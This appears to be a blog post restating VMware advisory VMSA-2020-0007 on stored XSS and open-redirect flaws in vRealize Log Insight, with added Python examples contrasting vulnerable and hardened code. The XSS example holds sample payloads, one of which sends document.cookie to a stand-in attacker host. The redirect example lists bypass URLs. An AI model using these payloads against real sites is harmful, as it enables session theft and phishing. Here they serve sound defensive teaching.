VMware Security Announcement VMSA-2020-0007

Today VMware released VMSA-2020-0007. This affects VMware vRealize Log Insight and addresses Cross Site Scripting (XSS) and Open Redirect vulnerabilities (CVE-2020-3953, CVE-2020-3954). Links to the patch information and download will be provided at the end of the post.

Impacted Products

VMware vRealize Log Insight

Cross Site Scripting (XSS) and Open Redirect vulnerabilities in vRealize Log Insight were privately reported to the VMware Security Response Center. Updates are available to remediate these vulnerabilities in vRealize Log Insight.

Cross Site Scripting (XSS) vulnerabilities in vRealize Log Insight due to improper input validation (CVE-2020-3953)

Description:
vRealize Log Insight does not properly validate user input, resulting in XSS vulnerabilities. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.4.

Known Attack Vectors:
A malicious actor with permissions equivalent to the predefined 'user' role may be able to add a malicious payload via the Log Insight UI which would be executed when the victim (another user or administrator) views this data in the UI (Stored XSS). Successful exploitation of this issue may result in a compromise of the victim's workstation.
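The attack vector above is the classic stored XSS shape: a low-privilege user saves a value through the UI, and the server later renders that value into HTML for a higher-privilege viewer without escaping it. As an added illustration (this is not Log Insight code; the field name, the template and the payloads are all constructed for the example), here is that defect class in miniature beside the usual fix, context-aware output escaping, plus a small regression check that tells the two apart:

```python
"""Stored XSS through an HTML template: the defect class behind CVE-2020-3953.

Added illustration, not vRealize Log Insight code: the field (a saved
dashboard title), the template and the payloads are constructed for this
example. It shows untrusted data interpolated straight into HTML beside
the fix, context-aware escaping, and a check you can run against both.
"""
import html

# Constructed sample values, as a user with the 'user' role might save them
# through the UI and an administrator might later view them.
STORED_TITLES = [
    "Errors in the last hour",
    '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\' + document.cookie)">',
    '"><script>alert(document.domain)</script>',
]

# The template below emits exactly three tags of its own: <h2>, </h2>, <input>.
TEMPLATE_TAG_COUNT = 3


def render_vulnerable(title: str) -> str:
    """The bug: the stored value is interpolated without escaping, in two
    different HTML contexts (element text and a quoted attribute)."""
    return f'<h2 class="title">{title}</h2><input name="title" value="{title}">'


def render_hardened(title: str) -> str:
    """The fix: escape for each output context. In element text '<', '>' and
    '&' must be encoded; inside a quoted attribute the quotes must go too."""
    text_ctx = html.escape(title, quote=False)
    attr_ctx = html.escape(title, quote=True)
    return f'<h2 class="title">{text_ctx}</h2><input name="title" value="{attr_ctx}">'


def tag_count(rendered: str) -> int:
    """Crude regression check: a correctly escaped page carries no '<' beyond
    the ones the template itself emits, whatever the stored value contains."""
    return rendered.count("<")


def round_trips(title: str) -> bool:
    """Escaping must not lose data: unescaping the hardened output gives the
    original title back, so the fix costs nothing in fidelity."""
    return html.unescape(html.escape(title, quote=True)) == title


if __name__ == "__main__":
    for title in STORED_TITLES:
        vuln, safe = render_vulnerable(title), render_hardened(title)
        print(f"{title[:40]!r:45} vulnerable tags={tag_count(vuln)} "
              f"hardened tags={tag_count(safe)} round-trip={round_trips(title)}")
```

The point of the tag count is that it is independent of the payload: you do not need a list of dangerous strings to notice that a page grew extra elements, which is what a stored payload must do to execute when the administrator opens the view.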

Resolution:

To remediate this issue, upgrade to vRealize Log Insight 8.1.0. There are no workarounds for older versions.

Open Redirect vulnerability in vRealize Log Insight due to improper input validation (CVE-2020-3954)

Description:
vRealize Log Insight does not properly validate user input, resulting in an Open Redirect vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 6.1.

Known Attack Vectors:
A malicious actor may be able to perform a phishing attack by sending a seemingly trusted URL for a vRealize Log Insight (vRLI) deployment to a victim. Upon opening this URL the victim will be redirected to a location of the attacker's choosing. Successful exploitation of this issue may result in a compromise of the victim's workstation.
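What makes the URL "seemingly trusted" is that its host really is the Log Insight deployment; only a redirect parameter in it points elsewhere. As an added illustration (not Log Insight code; the deployment origin, the parameter name and the sample URLs are constructed for the example), here is a return-URL handler that trusts the parameter beside one that only ever redirects within the application's own origin, checked against the usual bypasses (protocol-relative `//host`, backslash variants, `javascript:` and look-alike hosts):

```python
"""Open redirect on a return-URL parameter: the defect class behind CVE-2020-3954.

Added illustration, not vRealize Log Insight code. The deployment origin,
the parameter name ('next') and the sample URLs are constructed for the
example. It shows a handler that trusts the parameter beside one that only
ever redirects to the application's own origin.
"""
from urllib.parse import urljoin, urlsplit

APP_ORIGIN = "https://vrli.corp.example"   # hypothetical deployment
DEFAULT_TARGET = APP_ORIGIN + "/"
_APP = urlsplit(APP_ORIGIN)

# Constructed inputs a phishing link might carry in ?next=
SAMPLE_NEXT_VALUES = [
    "/dashboards?x=1",
    "https://vrli.corp.example/login",
    "https://evil.example/",
    "//evil.example/",
    "/\\evil.example/",
    "javascript:alert(1)",
    "https://vrli.corp.example.evil.example/",
    "https://vrli.corp.example@evil.example/",
    "",
]


def redirect_vulnerable(next_url: str) -> str:
    """The bug: whatever arrived in ?next= becomes the Location header."""
    return next_url or DEFAULT_TARGET


def safe_redirect_target(next_url: str) -> str:
    """The fix: resolve the value against the app origin and accept it only
    if the result is still on that origin; otherwise fall back to a default."""
    if not next_url:
        return DEFAULT_TARGET
    # Browsers treat '/\evil.example' like '//evil.example'; normalise first
    # so urlsplit sees what the browser will see.
    candidate = next_url.strip().replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative URL: only an exact same-origin one may pass.
        # This rejects 'javascript:' (scheme set), '//evil.example' (netloc set),
        # and look-alike hosts such as 'vrli.corp.example.evil.example' or
        # 'vrli.corp.example@evil.example' (netloc differs).
        if (parts.scheme.lower(), parts.netloc.lower()) != (_APP.scheme, _APP.netloc):
            return DEFAULT_TARGET
    elif not candidate.startswith("/") or candidate.startswith("//"):
        # Require a single leading slash: no bare relative paths, no '//host'.
        return DEFAULT_TARGET
    resolved = urljoin(DEFAULT_TARGET, candidate)
    final = urlsplit(resolved)
    if (final.scheme, final.netloc.lower()) != (_APP.scheme, _APP.netloc):
        return DEFAULT_TARGET
    # Return the absolute same-origin URL rather than a relative path: a path
    # that normalises to '//host' would be re-read by the browser as
    # protocol-relative if it were sent on its own.
    return resolved


if __name__ == "__main__":
    for value in SAMPLE_NEXT_VALUES:
        print(f"{value!r:48} vulnerable -> {redirect_vulnerable(value)!r:40} "
              f"hardened -> {safe_redirect_target(value)!r}")
```

The design choice worth noting is that the hardened handler never tries to enumerate bad inputs; it resolves the value the way a browser would and then compares scheme and host of the result with the deployment's own, so any encoding trick that still lands off-origin falls through to the default.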

Resolution:

To remediate this issue, upgrade to vRealize Log Insight 8.1.0. There are no workarounds for older versions.

Fixed Version(s) and Release Notes:

vRealize Log Insight 8.1.0:

https://my.vmware.com/web/vmware/info/slug/infrastructure_operations_management/vmware_vrealize_log_insight/8_1

Link to VMware advisory

https://www.vmware.com/security/advisories/VMSA-2020-0007.html

Happy Patching!